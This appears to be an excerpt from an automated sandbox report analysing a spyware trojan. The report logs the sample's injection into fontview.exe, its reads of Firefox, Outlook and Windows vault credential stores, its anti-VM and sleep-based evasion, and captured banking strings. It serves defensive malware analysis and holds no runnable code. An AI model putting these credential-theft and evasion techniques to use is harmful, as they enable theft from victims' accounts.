Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04445BF0	12_2_04445BF0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0440DBF9	12_2_0440DBF9
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043EFB80	12_2_043EFB80
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_00181D30	12_2_00181D30
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0017CC30	12_2_0017CC30
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0017CC27	12_2_0017CC27
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0017AE30	12_2_0017AE30
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0017CE50	12_2_0017CE50
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0017AF74	12_2_0017AF74
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0017AF80	12_2_0017AF80
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_001853E0	12_2_001853E0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_001835F0	12_2_001835F0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0019BBC0	12_2_0019BBC0
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0425E6ED	12_2_0425E6ED
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0425D7B8	12_2_0425D7B8
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0425E238	12_2_0425E238
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04265204	12_2_04265204
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0425E354	12_2_0425E354
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0425CA63	12_2_0425CA63

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: String function: 013F7E54 appears 111 times
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: String function: 0141EA12 appears 86 times
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: String function: 0142F290 appears 105 times
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: String function: 0139B970 appears 277 times
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: String function: 013E5130 appears 58 times
Source: C:\Windows\SysWOW64\fontview.exe	Code function: String function: 04405130 appears 58 times
Source: C:\Windows\SysWOW64\fontview.exe	Code function: String function: 0443EA12 appears 86 times
Source: C:\Windows\SysWOW64\fontview.exe	Code function: String function: 043BB970 appears 277 times
Source: C:\Windows\SysWOW64\fontview.exe	Code function: String function: 04417E54 appears 111 times
Source: C:\Windows\SysWOW64\fontview.exe	Code function: String function: 0444F290 appears 105 times

Source: ydJaT4b5N8.exe, 00000000.00000002.1415995175.000000000073E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ydJaT4b5N8.exe
Source: ydJaT4b5N8.exe, 00000000.00000000.1260773399.0000000000284000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTerx.exe0 vs ydJaT4b5N8.exe
Source: ydJaT4b5N8.exe, 00000000.00000002.1428765141.00000000073F7000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs ydJaT4b5N8.exe
Source: ydJaT4b5N8.exe, 00000000.00000002.1429727752.0000000009270000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs ydJaT4b5N8.exe
Source: ydJaT4b5N8.exe, 00000000.00000002.1424852227.00000000026A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs ydJaT4b5N8.exe
Source: ydJaT4b5N8.exe, 00000000.00000002.1425670641.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs ydJaT4b5N8.exe
Source: ydJaT4b5N8.exe, 0000000A.00000002.1659897255.0000000000F44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFONTVIEW.EXEj% vs ydJaT4b5N8.exe
Source: ydJaT4b5N8.exe, 0000000A.00000002.1659897255.0000000000F17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFONTVIEW.EXEj% vs ydJaT4b5N8.exe
Source: ydJaT4b5N8.exe, 0000000A.00000002.1660862435.000000000149D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ydJaT4b5N8.exe
Source: ydJaT4b5N8.exe	Binary or memory string: OriginalFilenameTerx.exe0 vs ydJaT4b5N8.exe

Source: ydJaT4b5N8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ydJaT4b5N8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@7/7

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ydJaT4b5N8.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\fontview.exe

File created: C:\Users\user~1\AppData\Local\Temp\FyF7rO8j-P

Jump to behavior

Source: ydJaT4b5N8.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ydJaT4b5N8.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: fontview.exe, 0000000C.00000002.3123858472.00000000004C1000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3123858472.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3123858472.00000000004B5000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1848372371.0000000000494000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1848372371.00000000004B5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ydJaT4b5N8.exe	Virustotal: Detection: 38%
Source: ydJaT4b5N8.exe	ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\ydJaT4b5N8.exe "C:\Users\user\Desktop\ydJaT4b5N8.exe"
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process created: C:\Users\user\Desktop\ydJaT4b5N8.exe "C:\Users\user\Desktop\ydJaT4b5N8.exe"
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	Process created: C:\Windows\SysWOW64\fontview.exe "C:\Windows\SysWOW64\fontview.exe"
Source: C:\Windows\SysWOW64\fontview.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process created: C:\Users\user\Desktop\ydJaT4b5N8.exe "C:\Users\user\Desktop\ydJaT4b5N8.exe"	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	Process created: C:\Windows\SysWOW64\fontview.exe "C:\Windows\SysWOW64\fontview.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\fontview.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: ydJaT4b5N8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ydJaT4b5N8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: fontview.pdbGCTL source: ydJaT4b5N8.exe, 0000000A.00000002.1659897255.0000000000F17000.00000004.00000020.00020000.00000000.sdmp, mErdTxurOiTQQ.exe, 0000000B.00000002.3124567094.00000000009D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fontview.pdb source: ydJaT4b5N8.exe, 0000000A.00000002.1659897255.0000000000F17000.00000004.00000020.00020000.00000000.sdmp, mErdTxurOiTQQ.exe, 0000000B.00000002.3124567094.00000000009D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mErdTxurOiTQQ.exe, 0000000B.00000002.3125711695.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp, mErdTxurOiTQQ.exe, 0000000D.00000002.3124355250.0000000000F7E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: ydJaT4b5N8.exe, 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1660118707.000000000403A000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1662507422.00000000041E6000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ydJaT4b5N8.exe, ydJaT4b5N8.exe, 0000000A.00000002.1660862435.0000000001370000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, fontview.exe, 0000000C.00000003.1660118707.000000000403A000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000003.1662507422.00000000041E6000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3128204993.0000000004390000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000C.00000002.3128204993.000000000452E000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_00AD3304 push esp; iretd	0_2_00AD3305
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_08F8BC67 push C80D8B90h; ret	0_2_08F8BC6C
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 0_2_08F864E1 push eax; iretd	0_2_08F864ED
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_004119AE push ss; iretd	10_2_004119D7
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_004032E0 push eax; ret	10_2_004032E2
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0041AC76 push esi; iretd	10_2_0041AC78
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_00411C0D push esp; ret	10_2_00411C14
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_00418C10 push eax; retf	10_2_00418C68
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_004145F0 push es; ret	10_2_004145F1
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_00411799 push ds; iretd	10_2_004117C9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0137225F pushad ; ret	10_2_013727F9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013727FA pushad ; ret	10_2_013727F9
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_013A09AD push ecx; mov dword ptr [esp], ecx	10_2_013A09B6
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_0137283D push eax; iretd	10_2_01372858
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Code function: 10_2_01371344 push eax; iretd	10_2_01371369
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043927FA pushad ; ret	12_2_043927F9
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0439225F pushad ; ret	12_2_043927F9
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0439283D push eax; iretd	12_2_04392858
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_043C09AD push ecx; mov dword ptr [esp], ecx	12_2_043C09B6
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0017E4B6 push ds; iretd	12_2_0017E4E6
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_001906A8 push es; ret	12_2_001906A9
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0017E6CB push ss; iretd	12_2_0017E6F4
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0017E92A push esp; ret	12_2_0017E931
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0018EE30 push esi; retf	12_2_0018EE3B
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0018F050 push ss; ret	12_2_0018F0BD
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_0018592D push eax; retf	12_2_00185985
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_00187993 push esi; iretd	12_2_00187995
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_00189DE8 push ecx; retf	12_2_00189DF3
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04265052 push eax; ret	12_2_04265054
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 12_2_04255BE4 push C5B5A5C0h; retf	12_2_04255BEB

Source: ydJaT4b5N8.exe

Static PE information: section name: .text entropy: 7.783031316864853

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: ydJaT4b5N8.exe PID: 1528, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\fontview.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\fontview.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\fontview.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\fontview.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\fontview.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\fontview.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\fontview.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\fontview.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Memory allocated: AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Memory allocated: 26A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Memory allocated: 23D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Memory allocated: 4CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Memory allocated: 5CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Memory allocated: 5DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Memory allocated: 6DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Memory allocated: 9320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Memory allocated: A320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Memory allocated: B320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	Memory allocated: B7B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

Code function: 10_2_013E096E rdtsc

10_2_013E096E

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\fontview.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe TID: 1408	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe TID: 7868	Thread sleep count: 41 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe TID: 7868	Thread sleep time: -82000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe TID: 7892	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\fontview.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\fontview.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\fontview.exe

Code function: 12_2_0018C620 FindFirstFileW,FindNextFileW,FindClose,

12_2_0018C620

Source: C:\Users\user\Desktop\ydJaT4b5N8.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: fontview.exe, 0000000C.00000002.3130931716.0000000007712000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,116
Source: FyF7rO8j-P.12.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: FyF7rO8j-P.12.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: FyF7rO8j-P.12.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: FyF7rO8j-P.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
